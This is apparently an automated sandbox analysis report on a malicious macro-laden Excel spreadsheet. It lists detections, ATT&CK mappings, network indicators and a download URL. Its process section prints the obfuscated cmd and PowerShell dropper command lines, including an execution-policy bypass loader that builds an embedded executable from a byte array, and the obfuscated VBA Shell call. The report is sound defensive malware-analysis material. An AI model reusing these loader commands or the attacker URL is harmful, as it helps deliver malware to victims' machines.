Loading ...

Analysis Report 7362_8164_(2019.2).xls

Overview

General Information

Joe Sandbox Version:25.0.0 Tiger's Eye
Analysis ID:808000
Start date:05.03.2019
Start time:17:14:28
Joe Sandbox Product:Cloud
Overall analysis duration:0h 4m 23s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:7362_8164_(2019.2).xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal84.expl.evad.winXLS@7/6@1/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold840 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsCommand-Line Interface21Winlogon Helper DLLProcess Injection1Disabling Security Tools1Credential DumpingProcess Discovery1Application Deployment SoftwareData from Local SystemData Encrypted1Standard Non-Application Layer Protocol2
Replication Through Removable MediaPowerShell3Port MonitorsAccessibility FeaturesProcess Injection1Network SniffingSecurity Software Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol2
Drive-by CompromiseScripting22Accessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic Protocol
Exploit Public-Facing ApplicationExploitation for Client Execution13System FirmwareDLL Search Order HijackingScripting22Credentials in FilesFile and Directory Discovery1Logon ScriptsInput CaptureData EncryptedMultiband Communication
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasqueradingAccount ManipulationSystem Information Discovery21Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 7362_8164_(2019.2).xlsvirustotal: Detection: 45%Perma Link

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: benistora.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.82:49218 -> 5.188.60.66:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.82:49218 -> 5.188.60.66:443

Networking:

barindex
Connects to country known for bullet proof hostersShow sources
Source: unknownNetwork traffic detected: IP: 5.188.60.66 Russian Federation
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)Show sources
Source: global trafficTCP traffic: 192.168.1.82:49218 -> 5.188.60.66:443
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSOJump to behavior
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: benistora.com
Urls found in memory or binary dataShow sources
Source: powershell.exe, 00000005.00000002.1636645086.01F76000.00000004.sdmpString found in binary or memory: https://benistora.com
Source: powershell.exe, 00000005.00000002.1634819377.00307000.00000004.sdmpString found in binary or memory: https://benistora.com/uploads/audio.7z
Source: powershell.exe, 00000005.00000002.1636329423.01D34000.00000004.sdmpString found in binary or memory: https://benistora.com/uploads/audio.7zH
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: 7362_8164_(2019.2).xlsOLE, VBA macro line: twing = Shell(Gle(Gle(Ety(Gle(Ety(Leged, Ts)), Ts))) & RawsAndTabs & GeneralOptinss, 0)
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: 7362_8164_(2019.2).xlsOLE, VBA macro line: Private Declare PtrSafe Function GetUserDefaultLCID% Lib "kernel32" ()
Source: 7362_8164_(2019.2).xlsOLE, VBA macro line: Private Declare PtrSafe Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long
Source: 7362_8164_(2019.2).xlsOLE, VBA macro line: Private Declare PtrSafe Function SetLocaleInfo Lib "kernel32" Alias "SetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String) As Boolean
Source: 7362_8164_(2019.2).xlsOLE, VBA macro line: Private Declare Function GetUserDefaultLCID% Lib "kernel32" ()
Source: 7362_8164_(2019.2).xlsOLE, VBA macro line: Private Declare Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long
Source: 7362_8164_(2019.2).xlsOLE, VBA macro line: Private Declare Function SetLocaleInfo Lib "kernel32" Alias "SetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String) As Boolean
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 5.188.60.66 443Jump to behavior
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 7042
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: Commandline size = 7042Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: 7362_8164_(2019.2).xlsOLE, VBA macro line: Private Sub st1_Layout()
Source: VBA code instrumentationOLE, VBA macro: Module Sheet1, Function st1_LayoutName: st1_Layout
Document contains embedded VBA macrosShow sources
Source: 7362_8164_(2019.2).xlsOLE indicator, VBA macros: true
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Yara signature matchShow sources
Source: 00000005.00000002.1636004810.01A69000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1638447073.04EE0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1635995960.01A60000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1634369984.00150000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1634433896.00190000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1634948704.011C0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1634387196.00160000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000005.00000002.1634303771.000D0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000005.00000002.1638385697.04350000.00000004.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000005.00000002.1638206829.03EE0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000005.00000002.1635853654.01920000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000005.00000002.1634554312.00220000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000005.00000002.1636329423.01D34000.00000004.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.4350000.5.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.4350000.5.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.220000.2.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.160000.1.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.160000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.1920000.3.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.1920000.3.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.220000.2.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.3ee0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.3ee0000.4.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Classification labelShow sources
Source: classification engineClassification label: mal84.expl.evad.winXLS@7/6@1/1
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\ExcelJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR76AB.tmpJump to behavior
Document contains an OLE Workbook stream indicating a Microsoft Excel fileShow sources
Source: 7362_8164_(2019.2).xlsOLE indicator, Workbook stream: true
Found command line outputShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3.jl...#........3.j....L.,.L|.j.......l$(.j...lr.v.L|.jD............7.j.......jL.,..<<.............$(.j...j....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...#.....<.X...A.5w................a.5w..0.....,.......T...f...................#.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t...L.../....<<.....A.5wt...............a.5w..0.....,.......T......................./.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L.../.....<.X...A.5w................a.5w..0.....,.......T......................./.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t...L...;....<<.....A.5wt...............a.5w..0.....,.......T.......................;.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...;.....<.X...A.5w................a.5w..0.....,.......T.......................;.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t...L...G...s.e.r.v.e.r.".".".".........a.5w..0.....,.......T.......................G.......T.........4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L.........<.X...A.5w................a.5w..0.....,...........V.....................................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t...L.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.5.8.....,.......................................T...$.....4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L.........<.X...A.5w................a.5w..0.....,.................................................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t...L...'....<<.....A.5wt...............a.5w..0.....,...............................'.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...'.....<.X...A.5w................a.5w..0.....,...............................'.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t...L...3....<<.....A.5wt...............a.5w..0.....,...............................3.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...3.....<.X...A.5w................a.5w..0.....,...........)...................3.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t...L...?....<<.....A.5wt...............a.5w..0.....,...........Q...................?.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...?.....<.X...A.5w................a.5w..0.....,...........l...................?.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t...L...K....<<.....A.5wt...............a.5w..0.....,...............................K.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...K.....<.X...A.5w................a.5w..0.....,...............................K.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t...L...W...s.s.'.,.'.P.'.).).). .).....a.5w..0.....,...............................W.......T.........4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...W.....<.X...A.5w................a.5w..0.....,...............................W.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t...L...c....<<.....A.5wt...............a.5w..0.....,...............................c.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...c.....<.X...A.5w................a.5w..0.....,...........5...................c.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t...L...o....<<.....A.5wt...............a.5w..0.....,...........]...................o...........f.....4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...o.....<.X...A.5w................a.5w..0.....,...........x...................o.................4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t...L...{... .<.....A.5wt...............a.5w..0.....,...............................{.......T.........4w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...{.....<.X...A.5w................a.5w..0.....,...............................{.................4w........Jump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: 7362_8164_(2019.2).xlsvirustotal: Detection: 45%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c%sUG%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c%sUG%Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: indows\System.pdbpdbtem.pdb0. source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbAC_ source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp
Source: Binary string: System.pdbjj source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source: Binary string: C:\Windows\dll\System.pdb source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source: Binary string: dows\System.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb56ad364e35\System.Management.Automation.pdbtion.ni.dllility.resources.exe source: powershell.exe, 00000005.00000002.1634819377.00307000.00000004.sdmp
Source: Binary string: em.pdb source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdbAu source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source: Binary string: System.Management.Automation.pdb$ source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.1635853654.01920000.00000002.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
